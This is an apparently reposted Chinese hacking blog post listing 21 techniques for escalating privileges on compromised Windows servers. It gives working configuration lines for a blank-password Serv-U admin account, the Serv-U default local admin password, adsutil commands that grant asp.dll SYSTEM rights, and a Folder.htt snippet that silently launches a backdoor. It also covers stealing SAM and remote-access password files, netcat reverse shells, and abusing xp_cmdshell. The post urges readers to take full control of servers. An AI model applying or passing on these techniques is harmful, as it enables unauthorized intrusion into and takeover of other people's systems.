Ring的許可權提升21大法！

作者：Nah 文章來源：http://blog.77169.com/more.asp?name=atan19a&id=6866

以下全部是本人提權時候的總結 很多方法至今沒有機會實驗也沒有成功，但是我是的確看見別人成功過

的。本人不才，除了第一種方法自己研究的，其他的都是別人的經驗總結。希望對朋友有協助！

1.radmin串連法

條件是你許可權夠大，對方連防火牆也沒有。封裝個radmin上去，運行，開對方連接埠，然後radmin上去

。本人從來米成功過。，連接埠到是給對方開啟了。

2.paanywhere

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 這裡下他的GIF

檔案，在本地安裝pcanywhere上去

3.SAM破解

C:/WINNT/system32/config/ 下他的SAM 破解之

4.SU密碼奪取

C:/Documents and Settings/All Users/「開始」菜單/程式/

引用：Serv-U，然後本地查看屬性，知道路徑後，看能否跳轉
進去後，如果有許可權修改ServUDaemon.ini，加個使用者上去，密碼為空白
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
這個使用者具有最高許可權，然後我們就可以ftp上去 quote site exec xxx 來提升許可權

5.c:/winnt/system32/inetsrv/data/

引用：就是這個目錄，同樣是erveryone 完全控制，我們所要做的就是把提升許可權的工具上傳上去，

然後執行

6.SU溢出提權

這個網上教程N多 不詳細講解了

7.運行Csript

引用：運行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"來提

升許可權
用這個cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll檔案：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll"

"C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll"

"C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32

/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

8.指令碼提權

c:/Documents and Settings/All Users/「開始」菜單/程式/啟動"寫入bat，vbs

9.VNC

這個是小花的文章 HOHO

預設情況下VNC密碼存放在HKCU/Software/ORL/WinVNC3/Password

我們可以用vncx4

破解它，vncx4使用很簡單，只要在命令列下輸入

c:/>vncx4 -W

然後順序輸入上面的每一個十六進位資料，沒輸完一個斷行符號一次就行了。

10.NC提權

給對方來個NC 但是條件是你要有足夠的運行許可權 然後把它反彈到自己的電腦上 HOHO OK了

11.社交工程學之GUEST提權
很簡單 查看他的擁護 一般來說 看到帳戶以後 密碼盡量猜 可能使用者密碼一樣 也可能是他QQ號 郵

箱號 手機號 盡量看看 HOHO

12.IPC空串連

如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

13.替換服務

這個不用說了吧？個人感覺相當複雜

14.autorun .inf

autorun=xxx.exe 這個=後面自己寫 HOHO 加上唯讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信

他不運行

15.desktop.ini與Folder.htt

引用：首先，我們現在本地建立一個檔案夾，名字不重要，進入它，在空白處點右鍵，選擇"自訂

檔案夾"（xp好像是不行的）一直下點，預設即可。完成後，你就會看到在此目錄下多了兩個名為Folder

setting的檔案架與desktop.ini的檔案，（如果你看不到，先取消"隱藏受保護的作業系統檔案"）然後

我們在Folder setting目錄下找到Folder.htt檔案，記事本開啟，在任意地方加入以下代碼： <OBJECT

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的後門檔案名稱">

</OBJECT> 然後你將你的後門檔案放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方

任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執行了我們的後門

16.su覆蓋提權

本地安裝個su，將你自己的ServUDaemon.ini檔案用從他那下載下來的ServUDaemon.ini 覆蓋掉，重

起一下Serv-U，於是你上面的所有配置都與他的一模一樣了

17.SU轉送連接埠

43958這個是 Serv －U 的本地管理連接埠。FPIPE.exe上傳他，執行命令： Fpipe –v –l 3333 –r

43958 127.0.0.1 意思是將4444連接埠映射到43958連接埠上。 然後就可以在本地安裝一個Serv-u，建立一個

伺服器，IP填對方IP，帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 串連上後你就可以管理他的

Serv-u了

18.SQL帳戶密碼泄露

如果對方開了MSSQL伺服器，我們就可以通過用SQL連接器加管理員帳號（可以從他的串連資料庫的

ASP檔案中看到），因為MSSQL是預設的SYSTEM許可權。

引用：對方沒有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass

中填入你所得到的使用者名稱與密碼。format選擇xp_cmdshell"%s"即可。然後點擊connect，串連上後就可

以在CMD一欄中輸入你想要的CMD命令了

19.asp.dll

引用：因為asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的機子放的位置不一定相同

)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll"

"C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll"

"C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32

/inetsrv/asp.dll"
好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
了,注意,用法中的get和set,一個是查看一個是設定.還有就是你運行上面的你要到

C:/Inetpub/AdminScripts>這個目錄下.
那麼如果你是一個管理員,你的機子被人用這招把asp提升為system許可權,那麼,這時,防的方法就是把

asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東.

20.Magic Winmail

前提是你要有個webshell 引用：http://www.eviloctal.com/forum/read.php?tid=3587 這裡去看吧

21.DBO……

其實 提升許可權的方式很多的 就看大家怎麼利用了 HOHO 加油吧 將伺服器控制到底！